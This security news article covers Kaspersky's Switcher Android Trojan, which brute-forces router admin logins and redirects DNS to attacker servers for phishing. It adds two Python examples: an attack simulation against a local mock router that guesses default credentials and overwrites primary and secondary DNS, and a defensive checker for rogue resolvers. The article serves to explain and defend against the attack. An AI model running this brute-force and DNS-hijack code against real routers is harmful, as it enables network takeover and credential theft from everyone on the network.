Wi-Fi Routers Infected by Switcher Trojan through Android Devices

Kaspersky Lab has identified a new Android Trojan, dubbed Switcher, that uses infected Android devices to attack Wi-Fi routers. The malware is currently being used against routers in China, but Kaspersky Lab researchers warn that it may signal a new and dangerous trend that could become a worldwide concern.

Attackers usually take control of Wi-Fi routers by attacking them directly. Switcher's approach is more efficient: the attackers infect Android users, whose devices then serve as unwitting pawns that attack whichever router they connect to, from inside the network.

Once a device is compromised, the Trojan brute-forces the administrative login of every Wi-Fi router the phone connects to. If the attack succeeds, the attackers gain administrator access to the router and with it full control of the device, so every phone, computer or tablet that later joins that Wi-Fi network is exposed to attack.

So far, every attack has begun with one of two bogus versions of legitimate Chinese apps: one that shares Wi-Fi network information, the other an Android client for Baidu, a Chinese search engine.

If either app is installed, the infected device attacks the next Wi-Fi network it connects to, trying a predefined list of login credentials against the router's administrative interface. The first username and password combination that works gives the attackers administrator access to the router.

The attackers then replace the router's primary DNS server with one under their control, and change the secondary DNS server as well so that it serves as a backup if the first rogue server fails. From then on, any device that connects to the router may be redirected to websites controlled by the attackers, which may host malware, serve phishing pages, push adware or deliver a range of other threats. Because the attack affects the whole Wi-Fi network rather than a single device, a large number of users can be exposed through one compromised router.
Anyone connecting to the network may be sent to a bogus login page for Facebook, Snapchat, Twitter or LinkedIn, designed to trick users into entering their credentials and handing them to the attackers. Any number of malicious payloads could be pushed to devices that connect through a hijacked router, and since busy public Wi-Fi networks are the ideal targets, a single successful attack can affect a huge number of people. One practical caveat: a rogue DNS answer alone does not give the attacker a valid TLS certificate for the real domain, so sites reached strictly over HTTPS are harder to spoof this way; the phishing page works best against users who arrive over plain HTTP or click through a certificate warning.
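The two steps just described (credential guessing against the router's admin login, then rewriting the primary and secondary DNS servers) as an added Python simulation against a local mock router. This is illustration code written for this article, not the Trojan's code and not Kaspersky's analysis tooling. The mock router's admin interface (HTTP Basic authentication, a /dns page with primary and secondary form fields), its factory default of admin/admin, the credential list and the RFC 5737 addresses used as rogue resolvers are all assumptions made for the demo.

```python
"""Simulation of the Switcher router-takeover flow against a local mock router.

Added example, not the Trojan's code and not Kaspersky's tooling. The admin
interface (HTTP Basic auth, a /dns page, the form field names), the default
password and the credential list are assumptions made for this demo.
"""
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib import error, parse, request

# Constructed credential list standing in for the Trojan's "predefined login credentials".
CREDENTIAL_LIST = [("admin", "123456"), ("admin", "password"), ("admin", "admin")]

# Attacker-controlled resolvers (RFC 5737 documentation addresses, constructed).
ROGUE_PRIMARY_DNS = "203.0.113.53"
ROGUE_SECONDARY_DNS = "198.51.100.53"


class MockRouter(BaseHTTPRequestHandler):
    """Minimal stand-in for a consumer router's web admin interface (assumed design)."""

    valid_credentials = ("admin", "admin")                    # weak factory default (assumed)
    dns = {"primary": "192.0.2.1", "secondary": "192.0.2.2"}  # current DNS settings

    def _authorized(self) -> bool:
        header = self.headers.get("Authorization", "")
        if not header.startswith("Basic "):
            return False
        decoded = base64.b64decode(header[6:]).decode("utf-8", "replace")
        return tuple(decoded.split(":", 1)) == self.valid_credentials

    def _require_auth(self) -> bool:
        if self._authorized():
            return True
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="router"')
        self.end_headers()
        return False

    def do_GET(self):
        if not self._require_auth():
            return
        body = f"primary={self.dns['primary']}&secondary={self.dns['secondary']}".encode()
        self.send_response(200)
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        if not self._require_auth():
            return
        length = int(self.headers.get("Content-Length", "0"))
        form = parse.parse_qs(self.rfile.read(length).decode())
        # The router trusts any authenticated client: this is all Switcher needs.
        MockRouter.dns = {"primary": form["primary"][0], "secondary": form["secondary"][0]}
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):  # keep the demo quiet
        pass


def _basic_auth(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def guess_admin_credentials(admin_url: str, candidates):
    """Try each predefined credential pair against the admin page; return the first that works."""
    for user, password in candidates:
        req = request.Request(admin_url, headers={"Authorization": _basic_auth(user, password)})
        try:
            with request.urlopen(req, timeout=2):
                return user, password
        except error.HTTPError as exc:
            if exc.code != 401:
                raise
    return None


def hijack_dns(admin_url: str, creds, primary: str, secondary: str) -> None:
    """With admin access, overwrite primary and secondary DNS with attacker-controlled resolvers."""
    data = parse.urlencode({"primary": primary, "secondary": secondary}).encode()
    req = request.Request(admin_url, data=data, headers={"Authorization": _basic_auth(*creds)})
    with request.urlopen(req, timeout=2):
        pass


def run_demo():
    """Start the mock router on a free localhost port, run the attack, return the outcome."""
    server = HTTPServer(("127.0.0.1", 0), MockRouter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    admin_url = f"http://127.0.0.1:{server.server_address[1]}/dns"
    try:
        creds = guess_admin_credentials(admin_url, CREDENTIAL_LIST)
        if creds is not None:
            hijack_dns(admin_url, creds, ROGUE_PRIMARY_DNS, ROGUE_SECONDARY_DNS)
        return creds, dict(MockRouter.dns)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())
```

Running the module prints the credential pair that worked and the router's DNS settings afterwards. The point to notice is that nothing in the flow requires an exploit: a weak default password plus an admin interface reachable from the LAN is enough, which is why a client device that has been tricked into installing a bad app is such an effective foothold.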

Nikita Buchka, a researcher at Kaspersky Lab, has warned that the changes the attackers make to the DNS settings are not easy to detect. Unless the Wi-Fi operator checks the router's DNS settings at regular intervals, it is unlikely they will notice that the router has been hijacked. Buchka also notes that the change is persistent and survives a reboot of the router.
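A client-side check for the kind of hijack described above, added here as example code (not Kaspersky's tooling and not part of the original article). It flags DNS servers handed out by DHCP that are neither on the LAN nor on an operator allowlist, and resolves a few canary domains both through the router and through a trusted resolver to spot rewritten answers. The resolver functions are injected so the example runs offline; the allowlist, the DHCP lease and the lookup answers are constructed sample data using RFC 5737 documentation addresses.

```python
"""Client-side checks for the router DNS hijack Switcher performs.

Added example, not Kaspersky's tooling and not part of the original article.
The resolver functions are injected so the logic runs offline; the DHCP lease
and the lookup answers below are constructed sample data.
"""
import ipaddress
from typing import Callable, Dict, Iterable, List

Resolver = Callable[[str], List[str]]

# Ranges a home or office router's own DNS forwarder would live in (RFC 1918).
LAN_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Public resolvers the operator deliberately hands out (constructed allowlist).
TRUSTED_DNS = {"1.1.1.1", "8.8.8.8"}

# Brands the article names as phishing targets; their real addresses are what an attacker fakes.
CANARY_DOMAINS = ["facebook.com", "snapchat.com", "twitter.com", "linkedin.com"]


def suspicious_dns_servers(dhcp_dns: Iterable[str], trusted=TRUSTED_DNS) -> List[str]:
    """Return DHCP-supplied DNS servers that are neither on the LAN nor on the allowlist.

    Switcher points clients at attacker-controlled public IPs, so an unexpected
    public resolver is the first red flag. The secondary server is checked too,
    because the Trojan sets it as a backup.
    """
    flagged = []
    for server in dhcp_dns:
        addr = ipaddress.ip_address(server)
        if server in trusted or any(addr in net for net in LAN_RANGES):
            continue
        flagged.append(server)
    return flagged


def hijacked_domains(domains: Iterable[str], via_router: Resolver, via_trusted: Resolver) -> Dict[str, dict]:
    """Resolve each canary through the router's resolver and a trusted one; report disagreements.

    Only a complete disagreement counts: CDN-backed sites can legitimately return
    different address sets to different resolvers, so an overlap is treated as benign.
    """
    report = {}
    for name in domains:
        router_answers = set(via_router(name))
        trusted_answers = set(via_trusted(name))
        if router_answers and trusted_answers and router_answers.isdisjoint(trusted_answers):
            report[name] = {"router": sorted(router_answers), "trusted": sorted(trusted_answers)}
    return report


def check_network(dhcp_dns, via_router, via_trusted, domains=CANARY_DOMAINS) -> dict:
    """Combine both checks into one report a monitoring job can run at regular intervals."""
    rogue = suspicious_dns_servers(dhcp_dns)
    hijacked = hijacked_domains(domains, via_router, via_trusted)
    return {"rogue_dns_servers": rogue, "hijacked_domains": hijacked, "compromised": bool(rogue or hijacked)}


# Constructed sample data (RFC 5737 addresses) standing in for a real DHCP lease and live lookups.
SAMPLE_DHCP_DNS = ["203.0.113.53", "198.51.100.53"]                # rogue primary and secondary
SAMPLE_TRUSTED = {"facebook.com": ["192.0.2.10"], "snapchat.com": ["192.0.2.11"],
                  "twitter.com": ["192.0.2.12"], "linkedin.com": ["192.0.2.13"]}
SAMPLE_ROUTER = {"facebook.com": ["203.0.113.80"], "snapchat.com": [],    # phishing host; no answer
                 "twitter.com": ["192.0.2.12"], "linkedin.com": ["203.0.113.80"]}


def sample_report() -> dict:
    """Run the checks over the constructed sample: two rogue servers, two hijacked domains."""
    return check_network(SAMPLE_DHCP_DNS,
                         lambda n: SAMPLE_ROUTER.get(n, []),
                         lambda n: SAMPLE_TRUSTED.get(n, []))


if __name__ == "__main__":
    print(sample_report())
```

In a real deployment the trusted resolver should be reached over DNS over TLS or HTTPS so the router cannot tamper with the comparison, and a disagreement should be treated as a signal to investigate rather than proof, since CDN-hosted sites can legitimately answer different resolvers with different addresses. Scheduling the check to run periodically addresses the researcher's point that the change survives a reboot and is otherwise unlikely to be noticed.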

Buchka reports that the criminals behind the campaign created a website to promote the two apps, and that the same site serves as the attackers' command and control server. The site's own security was weak, which allowed Kaspersky Lab to view a table listing the routers that had already been infected. As of Buchka's blog post announcing the discovery of Switcher, 1,280 Wi-Fi routers, all in China, had been compromised.

Posted by Emma Taylor

Emma Taylor is the contributing editor of Defensorum. Emma started on Defensorum as a news writer in 2017 and was promoted to editor in 2022. Emma has written and edited several hundred articles related to IT security and has developed a deep understanding of the sector. You can follow Emma on https://twitter.com/defensorum and contact Emma at emmataylor@defensorum.com.